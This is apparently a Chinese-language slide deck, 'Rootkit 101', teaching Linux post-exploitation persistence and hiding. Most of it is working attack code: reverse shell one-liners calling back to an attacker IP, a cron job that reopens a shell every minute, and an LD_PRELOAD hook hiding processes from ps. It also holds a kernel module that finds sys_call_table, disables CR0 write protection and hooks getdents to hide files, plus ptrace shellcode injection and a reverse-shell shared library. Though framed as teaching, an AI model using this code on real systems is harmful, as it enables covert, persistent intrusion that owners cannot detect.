Rootkit 101

名詞定義
攻擊者機器簡稱公雞
受害者機器簡稱瘦雞

remote shell
•瘦雞 ← 公雞
•接受連線後開⼀一個 shell 並把 IO stream 導到 TCP socket
•缺點 : 可能會被防火牆擋掉、受害者躲在內網連不到
socat TCP-LISTEN:9999 EXEC:/bin/bash
socat TCP:192.168.100.1:9999 -

reverse shell
•瘦雞 → 公雞
•同樣開⼀一個 shell 並把 IO stream 導到 TCP socket
socat TCP:192.168.100.2:9999 EXEC:/bin/bash
socat TCP-LISTEN:9999 -

reverse shell
•這邊解釋⽅方便便⽤用 socat 當例例⼦子，實際上瘦雞通常不會裝 socat
•可以⽤用 bash, python, ... 瘦雞有裝什什麼就⽤用什什麼
bash -i >& /dev/tcp/192.168.100.2/9999 0>&1
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_I
NET,socket.SOCK_STREAM);s.connect(("10.0.0.1",
1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),
2);p=subprocess.call(["/bin/sh","-i"]);'

crontab
•reverse shell 斷掉就沒了了，我們想要維持對瘦雞存取
•crontab 可以做⼯工作排程，定期執⾏行行⼯工作
•有 root 權限可以把排程寫到 /etc/cron.d, /etc/cron.hourly, ...
# reverse shell every minute
echo '*/1 * * * * bash -c "bash -i &> /dev/tcp/192.168.100.2/9999 0>&1"' | crontab
設定 user 的排程
crontab -l
查看 user 的排程

其他⽅方法
•也可以直接把⾃自⼰己的 key 加到 .ssh/authorized_keys 裡⾯面
•或是在他的網⾴頁伺服器裡⾯面插 webshell

什什麼是 rootkit
•rootkit 是⼀一種隱藏程序的技巧
•root + kit 意思就是拿到 root 權限後可以⽤用的⼯工具包

⽬目錄
•今天會介紹的 rootkit 技巧
• 基本⼩小技巧
• LD_PRELOAD
• Kernel Module
• Process Injection
• ⼤大部分會以隱藏 ps 指令列列出的程序為例例⼦子

基本⼩小技巧
•在 $PATH 環境變數中 /usr/local/bin 在 /bin 前⾯面
•寫⼀一個檔案在 /usr/local/bin/ps
•ps 就會執⾏行行 /usr/local/bin/ps ⽽而不是 /bin/ps
•grep -v 是 invert-match
#!/bin/bash
/bin/ps $@ | grep -Ev '192.168.100.2|socat'

LD_PRELOAD
•LD_PRELOAD 是⼀一個環境變量量，⽤用來來設定優先加載的動態函式庫
•把動態函式庫的路路徑寫在 /etc/ld.so.preload 也是⼀一樣的效果
ldd test
linux-vdso.so.1 (0x00007ffc6f5ea000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8dd3b7e000)
/lib64/ld-linux-x86-64.so.2 (0x00007f8dd4171000)
LD_PRELOAD=./hook.so ldd test
linux-vdso.so.1 (0x00007ffc6f5ea000)
./hook.so (0x00007f0ae13f1000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8dd3b7e000)
/lib64/ld-linux-x86-64.so.2 (0x00007f8dd4171000)

ltrace
•先看⼀一下 ps ⽤用到哪些 library function
•發現很多 readproc
ltrace ps

readproc
•⽤用 man 指令看⼀一下 readproc 是做什什麼的
•就是去讀 /proc 底下所有 process 的資訊
•去 hook 這個函式，我們可以把不想要出現的 process 丟掉

dlsym
•還是需要呼叫原本的 readproc
•⽤用 dlsym 這個函式去讀取⼀一個 symbol 的位址
•typeof 就只是⼀一個語法糖，在預編譯時期幫你填上型態
•RTLD_NEXT 是找下⼀一個 symbol ⽽而不是第⼀一個
typeof(readproc) *old_readproc = dlsym(RTLD_NEXT, "readproc");

流程
•整個流程會像下⾯面這樣
1. 呼叫原本的 readproc
2. 判斷這個 process 要不要隱藏
1. 要，再抓⼀一個 process 出來來看
2. 不要，就沒事
3. 回傳

POC
#define _GNU_SOURCE
#include <dlfcn.h>
#include <string.h>
#include <proc/readproc.h>
int hidden (char *target) {
char *keywords[2] = { “192.168.100.2", "socat" };
for (int i = 0; i < 2; i++) if (strstr(target, keywords[i])) return 1;
return 0;
}
proc_t* readproc (PROCTAB *PT, proc_t *return_buf) {
typeof(readproc) *old_readproc = dlsym(RTLD_NEXT, "readproc");
proc_t* ret_value = old_readproc(PT, return_buf);
while (ret_value
&& ret_value->cmdline
&& hidden(ret_value->cmdline[0])) {
ret_value = old_readproc(PT, return_buf);
}
return ret_value;
}

編譯
gcc -fPIC -shared -o hook.so hook.c -I./procps/
•需要下載正確版本的 procps 下來來
•procps v2 和 v3 的 proc_t, PROCTAB 結構有改

DEMO
https://asciinema.org/a/0M5KQUVkrY4Ha0gOOSS9pj97K

來來看看別⼈人寫的
https://github.com/naworkcaj/bdvl
•bedevil : 前⾝身是 vlany
•基於 LD_PRELOAD 的 linux rootkit
•直接 patch dynamic linker libraries 把 /etc/ld.so.preload
換成某個隱藏位址

Kernel Module
•把程式放到 kernel 裡⾯面在 ring 0 下執⾏行行
•那就可以做很多事了了，比如劫持 syscall

架設環境
1.編譯 kernel
2.打包⼀一個 initramfs
3.qemu-system-x86_64 跑起來來
4.gdb debug

編譯 kernel
1.去 www.kernel.org 載整包原始碼下來來
make menuconfig
make -j$(nproc)

initramfs
• initramfs 是⼀一個檔案系統
• bootloader 會把 initramfs 跟 kernel 放到記憶體上
• 然後把 kernel 跑起來來的時候會把 initramfs 的位址傳進去
• 之後 kernel 會去執⾏行行 initramfs/init 做⼀一些初始設定
• 最後才會把真正的檔案系統載入進來來

initramfs
• busybox 是許多常⾒見見⼯工具的組合包
• 接下來來我們會需要兩兩個檔案
• /initramfs/init
• /etc/passwd
mkdir --parents initramfs/{bin,dev,etc,lib,lib64,
mnt/root,proc,root,sbin,sys}
cp `which busybox` initramfs/bin/

/initramfs/init
• 做⼀一些必要的設定
• 最後 su root，所以會需要 /etc/passwd
#!/bin/busybox sh
/bin/busybox mkdir -p /usr/sbin /usr/bin /sbin /bin
/bin/busybox --install -s
mount -t proc none /proc
mount -t sysfs none /sys
ln -s /dev/console /dev/ttyS0
sleep 2
setsid cttyhack su root
poweroff -f

/etc/passwd
• 這樣 su 才不會說找不到 root 這個使⽤用者
root:x:0:0::/root:/bin/sh

initramfs
• 檔案系統建好之後就把他打包起來來
cd initramfs
find . -print0 | cpio --null --create --verbose
--format=newc | gzip --best > ../initramfs.cpio.gz

qemu-system-x86_64
• ⽤用 qemu-system-x86_64 跑起來來
• 使⽤用我們⾃自⼰己編的 kernel ( 有 debug info )
• 使⽤用我們⾃自⼰己包的 initramfs
• 可以 -enable-kvm 提⾼高效能
#!/bin/bash
qemu-system-x86_64 -kernel ./linux-5.0.9/arch/x86_64/boot/bzImage
-initrd ./initramfs.cpio.gz
-nographic
-append "console=ttyS0 nokaslr"
-gdb tcp:127.0.0.1:7777

gdb
• qemu 會開⼀一個 gdb server 給我們連
• 設定 add-auto-load-safe-path /path/to/linux-5.3.7
• 就會載入 vmlinux-gdb.py 裡⾯面的輔助函式
$ gdb vmlinux
(gdb) target remote :7777
(gdb) apropos lx # 顯⽰示包含 lx 的指令 ( 從 vmlinux-gdb.py 載入的輔助函式 )
lx-cmdline -- Report the Linux Commandline used in the current kernel
lx-cpus -- List CPU status arrays
lx-dmesg -- Print Linux kernel log buffer
...

hook syscall
1. 找到 sys_call_table 的位址
2. 將 sys_call_table 變成可寫
3. 找出要換掉的 syscall 函式
4. 換掉

sys_call_table 位址
•在 2.4 以前的內核版本，預設導出所有符號，所以可以直接⽤用
•如果⾃自⼰己編譯內核的話，可以修改原始碼⽤用 EXPORT_SYMBOL 把
sys_call_table 的符號導出來來
extern void *sys_call_table[];

•kallsyms_lookup_name 也可以抓位址，但他也不⼀一定會被導出
#include <linux/kallsyms.h>
static void **sys_call_table;
static int __init hook_init (void) {
sys_call_table = (void **)kallsyms_lookup_name("sys_call_table");
printk(KERN_INFO "sys_call_table = 0x%pxn", sys_call_table);
return 0;
}

•下⾯面兩兩個檔案路路徑有可能會有 sys_call_table 的位址
•/proc/kallsyms 是⼀一個特殊的檔案，會在讀取時動態產⽣生
cat /boot/System.map-$(uname -r) | grep "sys_call_table"
cat /proc/kallsyms | grep "sys_call_table"

•最穩的⽅方式是⾃自⼰己去 kernel 裡⾯面的 memory 撈 O_O
•kernel 5.x.x 有多包了了⼀一層 do_syscall_64
•那在這之前要先講⼀一下 syscall 的機制

module speciﬁc register
• module specific register 是⼀一塊跟 CPU 有關的暫存器
• 每個 msr 都會有個 index
• ⽤用 rdmsr, wrmsr 可以對 msr 做讀寫，必須提供 index
• kernel ⼀一開始在初始化的時候，把 entry_SYSCALL_64 寫到 msr[MSR_LSTAR]

syscall
1. user call syscall
2. change to ring 0
3. jmp to msr[MSR_LSTAR] 等於 entry_SYSCALL_64
4. entry_SYSCALL_64 call do_syscall_64
5. regs->ax = sys_call_table[nr](regs);

•我們已經在 ring 0 了了
•直接⽤用 rdmsr 讀 msr[MSR_LSTAR]
•直接在 entry_SYSCALL_64 instructions 裡⾯面找
movq %rax, %rdi
movq %rsp, %rsi
call do_syscall_64

•找到 do_syscall_64 後
•⼀一樣畫葫蘆，再找下⾯面這個 instruction
•他之後會 call rax，所以這個值就會是 sys_call_table
mov rax, QWORD PTR [rdi*8-?]

uint8_t *get_syscalltable (void) {
int lo, hi;
asm volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (MSR_LSTAR));
uint8_t *entry_SYSCALL_64 = (uint8_t *)(((uint64_t)hi << 32) | lo);
uint8_t *ptr;
uint8_t do_syscall_64_inst[7] = {
0x48, 0x89, 0xc7, // mov rdi, rax
0x48, 0x89, 0xe6, // mov rsi, rsp
0xe8, // call do_syscall_64
};
ptr = find(entry_SYSCALL_64, do_syscall_64_inst, 7);
uint8_t *do_syscall_64 = (uint8_t *)(ptr + 11 + ((uint64_t)0xffffffff00000000 | *(uint32_t *)(ptr + 7)));
uint8_t sys_call_table_inst[4] = {
0x48, 0x8b, 0x04, 0xfd // mov rax, QWORD PTR [rdi*8-?]
};
ptr = find(do_syscall_64, sys_call_table_inst, 4);
uint8_t *sys_call_table = (uint8_t *)((uint64_t)0xffffffff00000000 | *(uint32_t *)(ptr + 4));
return sys_call_table;
}

sys_call_table 變可寫
•cr0 register 的其中⼀一個 bit 是代表 read-only 區段可不可寫
•改成 0 就通通可寫啦
A control register is a processor register which changes or controls the
general behavior of a CPU or other digital device
- wikipedia

sys_call_table 變可寫
void writable_unlock (void) {
unsigned long val = read_cr0() & (~X86_CR0_WP);
asm volatile("mov %0,%%cr0": "+r" (val));
}
void writable_lock (void) {
unsigned long val = read_cr0() | X86_CR0_WP;
asm volatile("mov %0,%%cr0": "+r" (val));
}
•write_cr0 這個 function 在 kernel 5.x.x 版加了了檢查
•不過我們直接寫 assembly 就好啦

要 hook 哪個 syscall
•ps 做的事情就是去讀 /proc 底下所有檔案，基本上是 ls 的強化版，
那我們就先做 ls 隱藏檔案
•⼀一樣⽤用 strace ls 去看他呼叫了了哪些 syscall
•可以 hook getdents，在讀⽬目錄底下的檔案的時候就把不想要的丟掉

getdents
•getdents 跑完 dirp 會是⼀一個 linux_dirent 陣列列
•d_off 是指這是第幾個 linux_dirent
•d_reclen 是這個 linux_dirent 的長度，可以⽤用它來來找下⼀一個
linux_dirent

getdents hook
•kernel 5.x.x 多包了了⼀一層 do_syscall_64
•所以參參數傳遞變成是傳 struct pt_regs *regs
•kernel 4.x.x 是放在 stack 傳的

getdents hook
#define FILENAME "rootkit.ko"
int sys_getdents_hook(struct pt_regs *regs) {
int total = original_getdents(regs);
unsigned int fd = regs->di;
struct linux_dirent *dirent = regs->si;
unsigned int count = regs->dx;
int offset = 0;
while (offset < total) {
struct linux_dirent *ptr = (struct linux_dirent *)((uint8_t *)dirent + offset);
struct linux_dirent *next_ptr = (struct linux_dirent *)((uint8_t *)dirent + offset + ptr->d_reclen);
if (strncmp(ptr->d_name, FILENAME, strlen(FILENAME)) == 0) {
int reclen = ptr->d_reclen;
memmove(ptr, next_ptr, total - (offset + reclen));
total -= reclen;
} else {
offset += ptr->d_reclen;
}
}
return total;
}

DEMO
https://asciinema.org/a/nySYMlkNUoKXyGZidEFOsN1PV

ptrace
•ptrace 可以允許⼀一個 process 監控另⼀一個 process 的執⾏行行
•gdb 就是⽤用 ptrace syscall 來來 debug process 的

要 inject 哪個 process
•⽤用 ps 看⼀一下有什什麼 process
•chronyd : 是 ntpd 的替代品，⽤用來來校時的
•lvmetad : LVM metadata cache daemon，某種快取服務
•看起來來都可有可無，⽽而且使⽤用者不敢隨便便砍掉

ptrace
1. ptrace attach
2. ptrace getregs 拿 rip 的值
3. ptrace poketext 直接把 shellcode 放到 rip 指向的位址
4. ptrace detach

ptrace
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/user.h>
int main (int argc, char **argv) {
if (argc != 2) {
printf("Usage: %s <pid>n", argv[0]);
exit(0);
}
struct user_regs_struct regs;
pid_t pid = atoi(argv[1]);
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
wait(NULL);
ptrace(PTRACE_GETREGS, pid, NULL, &regs);
/* exit */
char shellcode[] = "x31xffx6ax3cx58x0fx05x90";
for (int i = 0; i < 48 / 4; i++) {
unsigned long *ptr = (unsigned long *)regs.rip;
ptrace(PTRACE_POKETEXT, pid, ptr + i, *((unsigned long *)shellcode + i));
}
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return 0;
}

linux-injectionhttps://github.com/gaffe23/linux-inject
•來來看看別⼈人怎麼寫的
•parse /proc/xxx/maps 去找⼀一段可執⾏行行的區段
•⽤用 ptrace 把⼀一段 shellcode 放上去
•malloc ⼀一段記憶體放 share library 的檔名
•⽤用 __libc_dlopen_mode 載入 share library
•free 記憶體
•share library 載入的時候就會呼叫 loadMsg
void hello() {
printf("I just got loadedn");
}
__attribute__((constructor)) void loadMsg() {
hello();
}

linux-injectionhttps://github.com/gaffe23/linux-inject
__attribute__((constructor)) void onload() {
int pid = fork();
if (pid == 0) {
const char* ip = "127.0.0.1";
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(9999);
inet_aton(ip, &addr.sin_addr);
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
for (int i = 0; i < 3; i++) {
dup2(sockfd, i);
}
execve("/bin/sh", NULL, NULL);
}
wait(NULL);
exit(0);
}
•寫個 reverse shell

demohttps://asciinema.org/a/YQxLngyWK8fhzDgg72gNyftvZ

Rootkit 101

More Related Content

What's hot (20)

Similar to Rootkit 101 (20)

More from WEI CHIEH CHAO (7)

Rootkit 101